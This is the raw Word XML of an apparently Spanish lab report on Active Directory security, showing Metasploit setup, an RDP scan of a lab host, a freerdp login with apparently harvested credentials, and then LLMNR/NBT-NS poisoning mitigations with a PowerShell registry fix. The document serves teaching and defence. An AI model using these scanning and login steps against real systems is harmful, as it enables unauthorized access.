                        <w:t># Inicia la base de datos de Metasploit</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="09745F1E" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                      <w:r>
                        <w:t>sudo msfdb init</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5071C230" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6"/>
                    <w:p w14:paraId="37337F6F" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                      <w:r>
                        <w:t># Inicia el servicio de base de datos de Metasploit</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4DAC908D" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                      <w:r>
                        <w:t>sudo msfdb start</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="70325925" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6"/>
                    <w:p w14:paraId="5692DE2C" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6"/>
                    <w:p w14:paraId="5B621008" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                      <w:r>
                        <w:t># Inicia metasploit</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5C0DD8C6" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6"/>
                    <w:p w14:paraId="07821640" w14:textId="3EB77501" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                      <w:r>
                        <w:t>sudo msfconsole</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C45998" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="76E8C874" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="6650B868" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="643978C4" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="66782ECF" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="0235DB16" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="346FBB61" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="32B1589C" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="3B6C19A4" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="231B55D7" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="4EE93DA9" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="4FF6A900" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="4FBD23F4" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="2BB08E2B" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="667340A4" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="4FE24E0A" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="0DDF117F" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="6E2FDFEE" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="6D834FF5" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="377E95D5" w14:textId="77777777" w:rsidR="000C4E5B" w:rsidRPr="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="501D6DF9" w14:textId="115E170E" w:rsidR="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3315"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="671834CA" w14:textId="7A088B57" w:rsidR="000C4E5B" w:rsidRDefault="000C4E5B" w:rsidP="000C4E5B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3315"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34D67B06" wp14:editId="737CDCE3">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1773557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57354" name=""/>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37395D5" w14:textId="77777777" w:rsidR="001F5E0C" w:rsidRDefault="001F5E0C" w:rsidP="000C4E5B"/>
    <w:p w14:paraId="7429F198" w14:textId="00B75F2C" w:rsidR="001F5E0C" w:rsidRDefault="001F5E0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Comprobaremos con el auxiliar de metasploit que la máquina tiene el servicio de escritorio remoto habilitado, usando el siguiente auxiliar ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5E0C">
        <w:t>auxiliary/scanner/rdp/rdp_scanner</w:t>
      </w:r>
      <w:r>
        <w:t>’ , por ultimo con set rhosts configure la IP de la máquina a la que queremos comprobar si tiene habilitado el escritorio remoto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E15D12E" w14:textId="77777777" w:rsidR="001F5E0C" w:rsidRDefault="001F5E0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0F84F7" w14:textId="64E6B023" w:rsidR="001F5E0C" w:rsidRDefault="001F5E0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0100233C" wp14:editId="4B29DA48">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="883759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9816" name=""/>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1F4A44F" w14:textId="77777777" w:rsidR="001F5E0C" w:rsidRDefault="001F5E0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A72DCA5" w14:textId="33930CDF" w:rsidR="001F5E0C" w:rsidRDefault="001F5E0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Podemos ver como lo detecta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6A5C9B" w14:textId="77777777" w:rsidR="001F5E0C" w:rsidRDefault="001F5E0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47065043" w14:textId="4EFC54F4" w:rsidR="001F5E0C" w:rsidRDefault="001F5E0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41540568" wp14:editId="59C4C0E8">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1118901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01048" name=""/>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EC7F279" w14:textId="77777777" w:rsidR="008A0D62" w:rsidRDefault="008A0D62" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710B862E" w14:textId="2B0FCE41" w:rsidR="008A0D62" w:rsidRDefault="008A0D62" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora</w:t>
      </w:r>
      <w:r w:rsidR="00301C9B">
        <w:t xml:space="preserve"> usaré </w:t>
      </w:r>
      <w:r w:rsidR="00301C9B" w:rsidRPr="00301C9B">
        <w:t>freerdp</w:t>
      </w:r>
      <w:r w:rsidR="00301C9B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="0F0F0F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00301C9B" w:rsidRPr="00301C9B">
        <w:t>para conectarme al</w:t>
      </w:r>
      <w:r w:rsidR="00301C9B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="0F0F0F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>escritorio remoto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CBA545" w14:textId="2138FD55" w:rsidR="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Iniciando en el escritorio remoto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2294138D" w14:textId="59CA9262" w:rsidR="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4356D0CB" w14:textId="225B7707" w:rsidR="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C279544" wp14:editId="29F21685">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="73660"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1626074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382B8950" w14:textId="11AF7444" w:rsidR="00301C9B" w:rsidRDefault="00FB6942">
                            <w:r>
                              <w:t>x</w:t>
                            </w:r>
                            <w:r w:rsidR="00301C9B" w:rsidRPr="00301C9B">
                              <w:t>freerdp /f /u:ALesander /p:abc123. /v:192.168.1.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279544" id="_x0000_s1037" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:.5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382B8950" w14:textId="11AF7444" w:rsidR="00301C9B" w:rsidRDefault="00FB6942">
                      <w:r>
                        <w:t>x</w:t>
                      </w:r>
                      <w:r w:rsidR="00301C9B" w:rsidRPr="00301C9B">
                        <w:t>freerdp /f /u:ALesander /p:abc123. /v:192.168.1.70</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6591D167" w14:textId="77777777" w:rsidR="00301C9B" w:rsidRPr="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="00301C9B"/>
    <w:p w14:paraId="7FA694FF" w14:textId="77777777" w:rsidR="00301C9B" w:rsidRPr="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="00301C9B"/>
    <w:p w14:paraId="35251B18" w14:textId="77777777" w:rsidR="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="00301C9B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267A6CB7" w14:textId="74BF5B6E" w:rsidR="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="00301C9B">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Siendo /u el usuario y /p la contraseña y /v la </w:t>
      </w:r>
      <w:r w:rsidR="00E25D51">
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de la máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A9457" w14:textId="77777777" w:rsidR="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="00301C9B">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2978EA33" w14:textId="77777777" w:rsidR="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="00301C9B">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B3AD32" w14:textId="10E9C4F2" w:rsidR="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="00301C9B">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7335288A" wp14:editId="79C642ED">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="886237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37373" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126"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67163457" w14:textId="77777777" w:rsidR="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="00301C9B">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB627CB" w14:textId="2E94C337" w:rsidR="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="00301C9B">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Consiguiendo el acceso:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787DA2D5" w14:textId="77777777" w:rsidR="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="00301C9B">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F862C03" w14:textId="77777777" w:rsidR="00301C9B" w:rsidRPr="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="00301C9B">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A93C708" w14:textId="2AC874DC" w:rsidR="00301C9B" w:rsidRDefault="00301C9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18688588" wp14:editId="00780720">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="390533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3283" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId127"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6F35D8EE" w14:textId="77777777" w:rsidR="008A0D62" w:rsidRDefault="008A0D62" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DAC52A4" w14:textId="30945E36" w:rsidR="008A0D62" w:rsidRDefault="00301C9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46EEFD15" wp14:editId="146B790C">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1000962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2879" name=""/>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709CAA70" w14:textId="77777777" w:rsidR="00B82601" w:rsidRDefault="00B82601" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6359276E" w14:textId="77777777" w:rsidR="00F51705" w:rsidRDefault="00F51705" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E63B3C" w14:textId="4649033D" w:rsidR="006A3EA4" w:rsidRPr="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc135575985"/>
      <w:r w:rsidRPr="00503CC9">
        <w:t>Defensa -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="0E9FA06B" w14:textId="77777777" w:rsidR="006A3EA4" w:rsidRDefault="006A3EA4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D67E8D" w14:textId="7FD6936E" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El envenenamiento LLMNR-NBT-NS (también conocido como "LLMNR poisoning" o "NBNS spoofing") es una técnica de ataque en la que un atacante puede interceptar y manipular el tráfico de red en una red local, con el objetivo de obtener credenciales o información confidencial. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B93075" w14:textId="74A12818" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora indicaré algunas medidas para protegerse de este tipos de ataques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC1C795" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6712693B" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Deshabilitar LLMNR y NBT-NS en los sistemas de la red: LLMNR y NBT-NS son protocolos de resolución de nombres utilizados para resolver nombres de dispositivos en una red local. </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sin embargo, estos protocolos pueden ser utilizados por los atacantes para envenenar la caché de nombres y realizar ataques de suplantación de identidad. Deshabilitar estos protocolos puede ayudar a prevenir este tipo de ataques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485BEEED" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E9C28F" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>2. Utilizar protocolos de red seguros: Utiliza protocolos de red seguros, como HTTPS, SSH o VPN, para proteger la información confidencial que se transmite en la red. Estos protocolos cifran los datos y hacen más difícil que un atacante pueda interceptarlos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D98DDC" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20242DAE" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>3. Utilizar autenticación fuerte: Es importante utilizar autenticación fuerte, como contraseñas seguras, autenticación multifactor (MFA), o autenticación basada en certificados, para proteger las cuentas de usuario y evitar que los atacantes puedan obtener credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F9303F" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BCB807" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Utilizar software de seguridad: Utilizar software de seguridad, como antivirus, firewalls y sistemas de detección de intrusiones (IDS), puede ayudar a detectar y prevenir ataques de envenenamiento LLMNR-NBT-NS. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ECC7E6" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70BD96D9" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>5. Actualizar el software y firmware: Es importante mantener actualizado el software y firmware de los dispositivos de red y sistemas operativos para corregir vulnerabilidades conocidas y prevenir ataques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3450E9EF" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2B4D45" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>6. Monitorear la red: Monitorear la red en busca de actividad inusual, como tráfico de red anómalo o dispositivos desconocidos en la red, puede ayudar a detectar posibles ataques antes de que puedan causar daño.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B400291" w14:textId="77777777" w:rsidR="00503CC9" w:rsidRDefault="00503CC9" w:rsidP="00503CC9">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350D5409" w14:textId="23B1D895" w:rsidR="006A3EA4" w:rsidRDefault="00503CC9" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora pasaremos en explicar </w:t>
      </w:r>
      <w:r w:rsidR="00316CB3">
        <w:t>cómo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deshabilitar  LLMNR y NBT-NS, lo haré en el controlador de dominio DC0</w:t>
      </w:r>
      <w:r w:rsidR="009B1D59">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>, con IP 192.168.1.</w:t>
      </w:r>
      <w:r w:rsidR="009B1D59">
        <w:t>79</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54706487" w14:textId="77777777" w:rsidR="006A3EA4" w:rsidRDefault="006A3EA4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0D4C5C" w14:textId="12C47959" w:rsidR="0061598F" w:rsidRDefault="0061598F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>El LLMNR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A5C4D1" w14:textId="77777777" w:rsidR="0061598F" w:rsidRDefault="0061598F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8F53FB" w14:textId="138C3977" w:rsidR="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Se podría hacer con un script de PowerShell pero habría que aplicarlo a cada equipo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B396DC" w14:textId="77777777" w:rsidR="00D222B8" w:rsidRPr="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A8630B" w14:textId="47A01324" w:rsidR="00D222B8" w:rsidRPr="00D222B8" w:rsidRDefault="00D222B8" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D222B8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>New-Item "HKLM:SOFTWAREPoliciesMicrosoftWindows NT" -Name DNSClient  -Force</w:t>
      </w:r>
      <w:r w:rsidRPr="00D222B8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D222B8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>New-ItemProperty "HKLM:SOFTWAREPoliciesMicrosoftWindows NTDNSClient" -Name EnableMultiCast -Value 0 -PropertyType DWORD  -Force</w:t>
      </w:r>
    </w:p>
